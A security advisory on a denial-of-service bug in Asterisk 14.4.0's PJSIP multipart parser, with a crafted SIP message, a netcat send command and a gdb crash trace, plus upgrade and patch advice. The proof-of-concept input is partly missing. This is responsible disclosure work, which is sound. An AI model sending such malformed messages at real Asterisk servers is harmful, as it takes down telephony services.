Skip to Content

Asterisk 14.4.0 PJSIP 2.6 Denial Of Service

Posted on 2 mins read

This vulnerability was discovered during an exercise with Sandro Gauci of Enable Security

Out of bound memory access in PJSIP multipart parser crashes Asterisk


A specially crafted SIP message with a malformed multipart body was found to cause a segmentation fault.


Abuse of this vulnerability leads to denial of service in Asterisk when chan_pjsip is in use. This vulnerability is likely to affect other code that makes use of PJSIP.

How to reproduce the issue

We started Asterisk by running $PREFIX/asterisk/sbin/asterisk -fc. Then we made use of the following SIP message which was sent to Asterisk over UDP to reproduce the issue:

Via: SIP/2.0/UDP;branch=7c337f30d7ce.1
From: "Alice, A," <>
To: Bob <>
Contact: Alice <>
content-type: multipart/mixed;`boundary=++


Note that the above SIP message only contains new lines (i.e. \n) and no carriage returns (i.e. \r). We sent this message by making use of netcat as follows:

| base64 -d - | nc -u localhost 5060

The following is a log from running Asterisk in gdb:

gdb --args asterisk -c


Asterisk Ready.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffd6b85700 (LWP 2625)]
0x00007ffff783fd4c in parse_multipart_part (pool=0x1dff930, 
    start=0x7ffff0004359 "--++=Discussion of Mbone Engineering
    Issues\\nc=IN IP4\nt=0
    0\nm=audio 3456 RTP/AVP 0\na=rtpmapt...\n--+", 
    len=18446744073709551615, pct=0x1dffd60) at
435             while (p!=end && *p!='\n') ++p;

The issue appears to be due to a loop that keeps running until the wrong memory location is read. This leads to a memory access violation. This issue is to be found within parse_multipart_part at pjsip/sip_multipart.c:435.

This issue was found using AFL, while fuzzing PJSIP.

Solutions and recommendations

Apply fix issued by Asterisk, upgrade to Asterisk 13.15.1, 14.4.1 or 13.13-cert4.

If making use of PJSIP, apply the patch in revision 5594. See